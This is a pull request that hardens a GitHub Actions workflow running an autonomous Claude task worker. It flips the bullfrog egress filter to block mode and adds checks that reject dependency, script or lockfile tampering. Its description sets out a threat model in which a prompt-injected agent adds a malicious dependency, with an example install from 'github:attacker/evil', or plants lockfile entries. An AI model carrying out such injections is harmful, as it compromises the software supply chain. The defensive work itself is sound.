### PR TITLE
fix(workflows): tighten Validate changed files + flip bullfrog to block

### DIFF
--- a/.github/workflows/_claude-task-worker.yml
+++ b/.github/workflows/_claude-task-worker.yml
@@ -119,24 +119,36 @@ jobs:
 
     steps:
       # Security scanning — block mode prevents secret exfiltration if RCE is achieved.
-      # Allowlist matches Uniswap/ai-toolkit's other workflow_call workers that
-      # already run in block mode. api.linear.app is included because this worker
-      # talks to Linear via mcp__linear__ tools.
+      #
+      # Allowlist is tuned per-workflow based on empirical egress observed in
+      # 4 dtl Task Worker audit-mode runs (process-task jobs, 2026-04-29 through
+      # 2026-05-13). bullfrog audit-mode logs DNS *replies* only (per source:
+      # agent/queue_audit.nft) so this list captures setup-phase egress
+      # comprehensively but runtime egress only at first DNS resolution.
+      # Required runtime hosts (api.anthropic.com) are added explicitly since
+      # they're invisible to audit after the first resolution-cache hit.
+      #
+      # Empirically observed setup-phase first-resolutions:
+      #   - registry.yarnpkg.com  (yarn install + bun install — dtl uses yarn registry, NOT npmjs)
+      #   - release-assets.githubusercontent.com  (covered by *.githubusercontent.com — setup-node)
+      #   - api.linear.app  (one-time OAuth client_credentials exchange + Linear MCP runtime)
+      #
+      # Required by code but not observable in audit logs (DNS caching):
+      #   - api.anthropic.com  (claude-code-action HTTP keep-alive across 150 turns)
+      #
+      # Intentionally NOT included (no empirical evidence, and unused vs sister workflows):
+      #   - registry.npmjs.org, *.npmjs.org  (dtl uses yarnpkg, never npmjs — 0 audit lines)
+      #   - bun.sh  (setup-bun pulls from github releases via *.githubusercontent.com — 0 audit lines)
+      #   - claude.ai, *.claude.ai  (only used by CLAUDE_CODE_OAUTH_TOKEN path; dtl uses API key)
       - name: Security scanning
         uses: bullfrogsec/bullfrog@1831f79cce8ad602eef14d2163873f27081ebfb3 # v0.8.4
         with:
           egress-policy: block
           allowed-domains: |
-            github.com
-            *.github.com
-            *.githubusercontent.com
+            release-assets.githubusercontent.com
             api.anthropic.com
-            claude.ai
-            *.claude.ai
             api.linear.app
-            bun.sh
-            registry.npmjs.org
-            *.npmjs.org
+            registry.yarnpkg.com
           enable-sudo: false
 
       # Generate a short-lived token from the GitHub App (replaces long-lived PAT)

--- a/.github/workflows/_claude-task-worker.yml
+++ b/.github/workflows/_claude-task-worker.yml
@@ -118,11 +118,26 @@ jobs:
       actions: read
 
     steps:
-      # Security scanning
+      # Security scanning — block mode prevents secret exfiltration if RCE is achieved.
+      # Allowlist matches Uniswap/ai-toolkit's other workflow_call workers that
+      # already run in block mode. api.linear.app is included because this worker
+      # talks to Linear via mcp__linear__ tools.
       - name: Security scanning
         uses: bullfrogsec/bullfrog@1831f79cce8ad602eef14d2163873f27081ebfb3 # v0.8.4
         with:
-          egress-policy: audit
+          egress-policy: block
+          allowed-domains: |
+            github.com
+            *.github.com
+            *.githubusercontent.com
+            api.anthropic.com
+            claude.ai
+            *.claude.ai
+            api.linear.app
+            bun.sh
+            registry.npmjs.org
+            *.npmjs.org
+          enable-sudo: false
 
       # Generate a short-lived token from the GitHub App (replaces long-lived PAT)
       - name: Generate GitHub App token
@@ -480,6 +495,41 @@ jobs:
             esac
           done
           echo "All changed files are in expected paths"
+
+          # Path allowlist is necessary but not sufficient: package.json is on
+          # the allowlist (so `npm version` can bump it during release), but a
+          # prompt-injected Claude session could also use that allowance to
+          # inject a malicious dependency. Verify that no dependency-bearing
+          # field changed; only the `version` field is permitted to differ.
+          if echo "$CHANGED" | grep -qE '^package\.json$'; then
+            TARGET_DEPS=$(git show "origin/$TARGET_BRANCH:package.json" 2>/dev/null | jq -S '{dependencies, devDependencies, peerDependencies, optionalDependencies, scripts, bin, main, module, types, exports}')
+            HEAD_DEPS=$(git show "HEAD:package.json" | jq -S '{dependencies, devDependencies, peerDependencies, optionalDependencies, scripts, bin, main, module, types, exports}')
+            if [ "$TARGET_DEPS" != "$HEAD_DEPS" ]; then
+              echo "::error::package.json changed beyond the version field. Autonomous worker may only bump version; dependency/scripts/entrypoint changes require a human PR."
+              echo "--- Diff (sensitive keys) ---"
+              diff <(echo "$TARGET_DEPS") <(echo "$HEAD_DEPS") || true
+              exit 1
+            fi
+            echo "✅ package.json: only version-class fields changed"
+          fi
+          # package-lock.json should regenerate identically when only version
+          # bumps. Verify by reinstalling from package.json and comparing the
+          # resulting lockfile to what Claude produced. This catches an attacker
+          # who tries to land arbitrary content in the lockfile (which npm
+          # would otherwise honor on subsequent `npm ci`).
+          if echo "$CHANGED" | grep -qE '^package-lock\.json$'; then
+            cp package-lock.json /tmp/claude-lockfile.json
+            npm install --package-lock-only --ignore-scripts >/dev/null 2>&1 || {
+              echo "::error::npm install --package-lock-only failed; cannot validate package-lock.json integrity"
+              exit 1
+            }
+            if ! diff -q /tmp/claude-lockfile.json package-lock.json >/dev/null; then
+              echo "::error::package-lock.json contents do not match what npm regenerates from package.json. Autonomous worker may not author lockfile content directly."
+              diff /tmp/claude-lockfile.json package-lock.json | head -40 || true
+              exit 1
+            fi
+            echo "✅ package-lock.json: matches deterministic regeneration from package.json"
+          fi
 
       # Check if a PR was created by Claude
       - name: Check for PR


### PR DESCRIPTION
## Summary

Two hardenings to the `_claude-task-worker.yml` chain in this repo:

1. The current `Validate changed files` allowlist permits `package.json` and `package-lock.json` (so `npm version` can bump the version during release). The allowance is too broad: a prompt-injected Claude session can also add a malicious dependency to `package.json`, and the deploy guard `npm view ... && skip` in `deploy.yaml` is bypassed by the version bump that lands alongside.

2. bullfrog was running in `egress-policy: audit` (log-only). The other ai-toolkit workers (`_claude-main.yml`, `_claude-code-review.yml`, etc.) already use `block` mode.

## Fix

### a. Strengthen package.json / package-lock.json validation

When `package.json` is in the diff, jq-compare a sensitive-keys subset between the target branch and HEAD. Only the `version` field is allowed to differ:

```bash
TARGET_DEPS=$(git show "origin/$TARGET_BRANCH:package.json" | jq -S '{dependencies, devDependencies, peerDependencies, optionalDependencies, scripts, bin, main, module, types, exports}')
HEAD_DEPS=$(git show "HEAD:package.json" | jq -S '{...}')
[ "$TARGET_DEPS" = "$HEAD_DEPS" ] || { echo "::error::..."; exit 1; }
```

When `package-lock.json` is in the diff, regenerate it deterministically and diff:

```bash
cp package-lock.json /tmp/claude-lockfile.json
npm install --package-lock-only --ignore-scripts
diff -q /tmp/claude-lockfile.json package-lock.json
```

This catches:
- Direct dependency injection (`npm install left-pad@github:attacker/evil` or hand-edited `package.json`)
- Lockfile-only attacks (`npm ci` honors `package-lock.json` verbatim, so attacker-authored lockfile entries can substitute a malicious tarball even when `package.json` looks clean)
- Script injection via `"scripts"`, `"bin"`, or entrypoint fields (`main`/`module`/`types`/`exports`)

### b. bullfrog → block mode

Flip `egress-policy: audit` → `egress-policy: block` with the same allowlist used by ai-toolkit's block-mode workflows, plus `api.linear.app` for the Linear MCP server.

## Test plan

Manual: the jq-diff is deterministic for both unchanged inputs (passes) and any modification to the sensitive-key subset (fails with a clear error). `npm install --package-lock-only --ignore-scripts` is the standard npm operation for lockfile regeneration; if the result differs from what Claude produced, Claude authored lockfile content directly.

YAML validates with `yaml.safe_load`.

**Verification post-merge**: trigger a legitimate version-bump task and confirm the validation step passes. File a Linear ticket asking Claude to add a dependency and confirm the step fails with the expected error.

## Session context

Discovered during the bug bounty review that produced PR #2484 and [Uniswap/ai-toolkit#509](https://github.com/Uniswap/ai-toolkit/pull/509). Adversarial review specifically flagged the `package.json` allowance as the most exploitable gap remaining after the heredoc-delim fix.